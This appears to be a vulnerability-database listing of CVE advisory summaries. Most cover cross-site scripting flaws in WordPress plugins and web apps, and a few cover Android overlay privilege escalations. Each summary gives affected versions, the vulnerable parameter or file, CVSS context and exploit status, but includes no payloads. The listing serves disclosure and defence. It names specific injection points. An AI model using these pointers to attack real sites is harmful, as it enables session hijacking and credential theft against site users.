Reflected Cross-Site Scripting in the rognone WordPress plugin (versions ≤ 0.6.2) exposes visitors of affected sites to arbitrary JavaScript injection via the unsanitized 'mode' URL parameter in header.php. Unauthenticated remote attackers (PR:N per CVSS) can deliver a malicious link that, when clicked by a victim, executes attacker-controlled scripts in the victim's browser within the changed scope (S:C) of the WordPress application context. No active exploitation has been confirmed (not listed in CISA KEV), and no public exploit code has been identified at time of analysis, though the trivial attack complexity (AC:L) and zero authentication requirement lower the bar for opportunistic abuse.
Stored Cross-Site Scripting in the FPW Category Thumbnails WordPress plugin (all versions ≤1.9.5) allows authenticated attackers with Subscriber-level access to plant persistent JavaScript payloads via the unsanitized 'id' parameter of the 'fpw_fs_get_file' AJAX action. The injected script executes in an administrator's browser upon visiting the plugin's settings page, creating a privilege-escalation pathway from low-privileged subscriber to effective site administrator. No public exploit has been identified and the vulnerability is not listed in CISA KEV at time of analysis, but the low attack complexity and Changed Scope signal meaningful risk in open-registration WordPress environments.
Stored Cross-Site Scripting in the ZeM STL WordPress plugin (all versions through 1.0) allows authenticated contributors to plant persistent malicious scripts in page content via unsanitized [zemstl] shortcode attributes. Wordfence confirmed that the 'url', 'color', and 'bgcolor' shortcode parameters are directly interpolated into HTML attribute context within zemstl.php without passing through WordPress's esc_attr() or any equivalent escaping function, as evidenced by references to the vulnerable source lines (L74, L103, L104, L107). Any site visitor who loads a page containing the injected shortcode will silently execute the attacker's script, enabling session hijacking, credential theft, or privilege escalation against higher-privileged users including administrators. No public exploit code has been identified and this CVE is not listed in CISA KEV at time of analysis.
Stored cross-site scripting in CordysCRM (1Panel-dev, versions up to 1.4.1) allows an authenticated remote attacker to inject malicious scripts via the unvalidated Description parameter in the ModuleFormController's Save function. The payload persists to the database and executes in any victim's browser upon viewing the affected module form, enabling session hijacking, credential theft, or UI-based phishing. A publicly available proof-of-concept exists (GitHub issue #2233); no public exploitation at scale has been confirmed, and an official vendor patch is available as of v1.7.0.
Cross-site scripting in the GeniexWebView component of Transsion's AI Assistant Lifestyle Android application (com.transsion.aiassistantlifestyle) enables unauthenticated remote attackers to execute arbitrary JavaScript within the app's WebView context by delivering a crafted web_action_data URL parameter to a victim. The Changed scope (S:C) in the CVSS vector indicates impact crosses the originating component boundary - a meaningful risk in Android WebViews where JavaScript-to-native bridges may be exposed. No public exploit identified at time of analysis, and the EPSS score of 0.12% at the 31st percentile signals low current exploitation interest.
Stored Cross-Site Scripting in the Simple Custom Login Page WordPress plugin (versions ≤ 1.0.3) allows authenticated administrators to inject arbitrary CSS rules into wp-login.php, which is then rendered for every unauthenticated visitor to the login page. The changed scope (S:C in CVSS) is the critical risk amplifier: a single administrator-level compromise or malicious admin can silently overlay phishing UI elements on the WordPress login page, harvesting credentials from any user who subsequently visits. No public exploit code has been identified at time of analysis and this vulnerability is not listed in the CISA KEV catalog.
Stored Cross-Site Scripting in the Auto Image Attributes From Filename With Bulk Updater WordPress plugin (all versions through 4.9) allows authenticated attackers holding Author-level access or higher to persist arbitrary JavaScript payloads via unsanitized attachment metadata fields. The injected scripts execute in the browser of any user who subsequently accesses the affected page, with Changed scope (S:C) indicating the payload crosses the plugin's trust boundary into the broader WordPress session context. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog.
Cross-site scripting in 1Panel-dev CordysCRM versions up to 1.6.2 allows a high-privileged authenticated attacker to inject unescaped HTML payloads through request parameters processed by the Jackson string deserializer in RequestParamTrimConfig.java. The root cause is a global XSS escape toggle (xss.escape.all.enabled) that was disabled by default, meaning all incoming string parameters were returned without HTML sanitization. Publicly available exploit code exists (CVSS E:P, confirmed by VulDB disclosure), though the vulnerability has not been listed in CISA KEV and real-world impact is constrained by the high privilege requirement and passive user interaction dependency.
Reflected cross-site scripting in itsourcecode Fees Management System 1.0 allows remote unauthenticated attackers to inject arbitrary JavaScript into a victim's browser by manipulating the `page` argument of index.php. The vulnerability requires passive user interaction - a victim must follow a crafted URL - limiting its scalability, but publicly available exploit code lowers the barrier to abuse. No KEV listing exists; this is a low-severity finding corroborated by a CVSS 4.0 score of 2.1 and an exploit-modified (E:P) supplemental metric.
Cross-site scripting in westboy CicadasCMS Task Scheduling Management Module allows a high-privileged, authenticated attacker to inject malicious script payloads via the ScheduleJobController component that execute in a victim user's browser upon viewing the affected page. The vulnerability carries a CVSS base score of just 2.4, reflecting the steep access barriers of required high privileges (PR:H) and mandatory user interaction (UI:R), though a publicly available proof-of-concept exploit exists on the Gitee issue tracker. No active exploitation has been confirmed by CISA KEV, and the vendor has not responded to the responsible disclosure report, meaning no patch is available at time of analysis.
Cross-site scripting in usememos Memos v.0.26.0 allows remote unauthenticated attackers to inject malicious scripts that execute in victims' browsers by exploiting insufficient sanitization in the SANITIZE_SCHEMA configuration within the MemoContent rendering component. Publicly available exploit code exists (PoC gist by gabdevele). Both Public and Private Memo View pages are affected, enabling sensitive information disclosure and limited content manipulation across the changed scope boundary. EPSS stands at 0.05% (17th percentile), indicating low widespread exploitation probability despite the PoC's existence.
Cross-site scripting in Northern.tech CFEngine Enterprise Mission Portal (the web-based management UI) affects versions 3.24.3 and 3.27.0, patched in 3.24.4 and 3.27.1 respectively. An unauthenticated remote attacker can craft a malicious URL or inject content that, when rendered in a victim's browser within the Mission Portal, executes arbitrary JavaScript in the context of the victim's session. No public exploit identified at time of analysis, and EPSS places this in the 5th percentile, indicating low observed exploitation interest.
Stored cross-site scripting in Kiteworks Secure Data Forms allows authenticated low-privileged attackers to inject persistent malicious JavaScript that executes in other users' browser sessions. All Kiteworks releases prior to version 9.3.0 are affected, and the changed-scope CVSS modifier (S:C) confirms that injected scripts execute beyond the attacker's own session boundary, enabling session hijacking, credential theft, or unauthorized actions on behalf of victim users. No public exploit code has been identified and this CVE is not listed in the CISA KEV catalog at time of analysis.
Reflected cross-site scripting in Kiteworks Secure Data Forms (versions prior to 9.3.0) allows remote unauthenticated attackers to execute arbitrary JavaScript in a victim's browser after the victim is lured into clicking a crafted link. The CVSS 8.2 score is elevated by a changed scope (S:C) and high confidentiality impact, reflecting potential session theft or pivoting against the Kiteworks Private Data Network; no public exploit identified at time of analysis and not present in CISA KEV.
Local privilege escalation in Google Android (versions 14, 15, 16, and 16-qpr2) stems from a tapjacking/overlay weakness in the addWindow function of WindowManagerService.java. A locally-installed malicious app holding low privileges can draw deceptive overlays to hijack user taps and gain elevated permissions without requiring further user interaction. No public exploit identified at time of analysis, and SSVC indicates exploitation is not currently observed, but technical impact is rated total.
Tapjacking and UI overlay exploitation in Android's WindowState.java enables local privilege escalation on Android 14, 15, 16, and 16-qpr2 without requiring any elevated permissions from the attacker. A malicious app on the device can deploy a deceptive overlay over system permission dialogs, causing the victim to unknowingly grant elevated permissions. No public exploit has been identified at time of analysis, and EPSS at 0.01% (1st percentile) indicates very low current exploitation probability, though the broad Android version coverage across actively maintained releases elevates the aggregate exposure.
Local privilege escalation in Google Android (versions 14, 15, 16, and 16-qpr2) is possible via a tapjacking/overlay attack against the startAnimation function in StageCoordinator.java. An attacker with local code execution can elevate privileges without user interaction or additional execution rights. No public exploit identified at time of analysis and EPSS exploitation probability is very low (0.01%).
Cross-site scripting in code-projects Hotel and Tourism Reservation System 1.0 allows remote unauthenticated attackers to inject and execute arbitrary JavaScript by manipulating the name, email, people, or number parameters submitted to /ht/tour.php. The POC repository title ('Stored-XSS') strongly suggests this is a persistent (stored) XSS variant, meaning injected payloads survive in the application and execute in the browsers of subsequent users who view the affected reservation data - not merely the attacker's own session. Publicly available exploit code exists; this CVE has not been added to the CISA KEV catalog at time of analysis.
Reflected cross-site scripting in Kiteworks Secure Data Forms prior to version 9.3.0 allows external attackers to execute arbitrary JavaScript in a victim's browser session by tricking them into clicking a crafted link. The flaw carries a CVSS 8.2 due to scope change (S:C) and high confidentiality impact, but exploitation requires user interaction. At time of analysis, no public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Stored XSS in the myCred WordPress plugin (versions through 3.0.4) enables authenticated low-privileged attackers to persistently inject malicious scripts into web pages served by the application. When a victim - such as an administrator - subsequently visits an affected page, the stored payload executes within their browser session in the context of the WordPress origin, enabling session hijacking, credential theft, or unauthorized actions on behalf of the victim. No public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.
Reflected cross-site scripting in ThimPress LearnPress WordPress plugin through version 4.3.6 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser when the victim clicks a crafted link. The CVSS scope-changed vector (S:C) indicates impact extends beyond the vulnerable component, typical of XSS reaching the WordPress admin context, and no public exploit has been identified at time of analysis.
DOM-based cross-site scripting in VeronaLabs WP Statistics plugin for WordPress through version 14.16.6 allows remote attackers to execute arbitrary JavaScript in a victim's browser when the user is lured into interacting with a malicious link or page. The CVSS 7.1 score reflects unauthenticated network exploitability with user interaction required and a scope change, but no public exploit code has been identified at time of analysis and the issue is not listed in CISA KEV.
Quick Facts
- Typical Severity
- MEDIUM
- Category
- web
- Total CVEs
- 38830